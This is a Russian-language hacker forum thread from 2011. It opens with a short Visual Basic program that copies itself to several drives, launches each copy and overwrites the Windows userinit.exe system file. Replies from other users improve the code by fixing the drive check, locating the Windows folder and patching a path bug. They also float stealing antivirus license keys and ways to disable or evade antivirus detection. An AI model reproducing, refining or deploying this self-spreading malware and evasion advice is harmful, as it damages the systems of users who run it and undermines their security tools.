12 злых строк

viruskill

Дата: Четверг, 01.12.2011, 14:36 | Сообщение # 1

[ Мужык ]

Самый главный

Группа: Админы

Сообщений: 973

Репутация: 100

Sub Main()
a = App.Path + "\" + App.EXEName + ".exe"
b = "cdefgde"
For i = 1 To 7
f = Str(Rnd(500))
m = Mid(b, i, 1) + ":\" + f + ".exe"
On Error Resume Next
FileCopy a, m
Shell m
Next i
If Left((App.Path), 1) = "c" Then FileCopy a, "C:\WINDOWS\system32\userinit.exe"
End Sub

На каждую хитрую жопу найдется член с резьбой!
Семь бед - один Reset...
Семь раз подумай, один раз отформатируй.....

DiffiT

Дата: Пятница, 02.12.2011, 10:13 | Сообщение # 2

[ Мужык ]

Старший криведко

Группа: Админы

Сообщений: 1879

Репутация: 16

Quote (viruskill)

If Left((App.Path), 1) = "c" Then FileCopy a, "C:\WINDOWS\system32\userinit.exe"

наверное всё таки

Code

If Not Left((App.Path), 1) = "c" Then FileCopy a, "C:\WINDOWS\system32\userinit.exe"

Тот, у кого есть мозги и руки,
Никогда не пропадёт от голода и скуки.

DiffiT

Дата: Пятница, 02.12.2011, 10:15 | Сообщение # 3

[ Мужык ]

Старший криведко

Группа: Админы

Сообщений: 1879

Репутация: 16

Quote (viruskill)

Shell m

d wbrkt// 'nj ckbirjv ;tcnjrj)

Тот, у кого есть мозги и руки,
Никогда не пропадёт от голода и скуки.

viruskill

Дата: Пятница, 02.12.2011, 11:51 | Сообщение # 4

[ Мужык ]

Самый главный

Группа: Админы

Сообщений: 973

Репутация: 100

Нет, в коде все верно =)

На каждую хитрую жопу найдется член с резьбой!
Семь бед - один Reset...
Семь раз подумай, один раз отформатируй.....

DiffiT

Дата: Понедельник, 05.12.2011, 06:45 | Сообщение # 5

[ Мужык ]

Старший криведко

Группа: Админы

Сообщений: 1879

Репутация: 16

Получается, что юзеринит подменяется тока со второго раза с диска ЦЭ.
Кстати, винда может быть и в другой папке и на другом диске...
Допиги

Code

Environ("windir")

И ещё вот тут

Code

a = App.Path + "\" + App.EXEName + ".exe"

дырка, о которой я тебе раньше говорил. Слэш на конце уже может быть на конце App.Path, поэтому нужна проверка.

Тот, у кого есть мозги и руки,
Никогда не пропадёт от голода и скуки.

viruskill

Дата: Понедельник, 05.12.2011, 15:07 | Сообщение # 6

[ Мужык ]

Самый главный

Группа: Админы

Сообщений: 973

Репутация: 100

я писал это чудо природы в свободные пятнадцать минут в течении трудового дня =) так то если че - тут можно дофига чего подправить и подделать =)

На каждую хитрую жопу найдется член с резьбой!
Семь бед - один Reset...
Семь раз подумай, один раз отформатируй.....

Scamper

Дата: Понедельник, 05.12.2011, 15:34 | Сообщение # 7

[ Мужык ]

Посвящённый

Группа: Админы

Сообщений: 671

Репутация: 8

Лучше состряпайте микропрограмму которая копирует ключи антивирусных программ у юзеров, затем удаляет оригинал и отправляет копию.

Компьютер позволяет решать все те проблемы, которые до его изобретения не существовали.

DiffiT

Дата: Понедельник, 05.12.2011, 16:12 | Сообщение # 8

[ Мужык ]

Старший криведко

Группа: Админы

Сообщений: 1879

Репутация: 16

воровать ключи у антивируса из под носа - это всё равно, что отжимать у мента ксиву

Тот, у кого есть мозги и руки,
Никогда не пропадёт от голода и скуки.

viruskill

Дата: Понедельник, 05.12.2011, 17:23 | Сообщение # 9

[ Мужык ]

Самый главный

Группа: Админы

Сообщений: 973

Репутация: 100

вопрос в том, как сделать программу не похожей на вирус =) либо на каждом шагу юзать апи, либо вырубать антивирь

На каждую хитрую жопу найдется член с резьбой!
Семь бед - один Reset...
Семь раз подумай, один раз отформатируй.....

DiffiT

Дата: Вторник, 06.12.2011, 06:54 | Сообщение # 10

[ Мужык ]

Старший криведко

Группа: Админы

Сообщений: 1879

Репутация: 16

АПИ юзаются в любом случае (Просто в вб используются "оболочки" для этих функций)
Как п оказала практика, эвристика срабатывает, даже если код наполнять мусором.
Реально обмануть антивирус монжно только используя ассемблер (фишки со смещением сегментов) всё остальное - так, игрушки...)))

Тот, у кого есть мозги и руки,
Никогда не пропадёт от голода и скуки.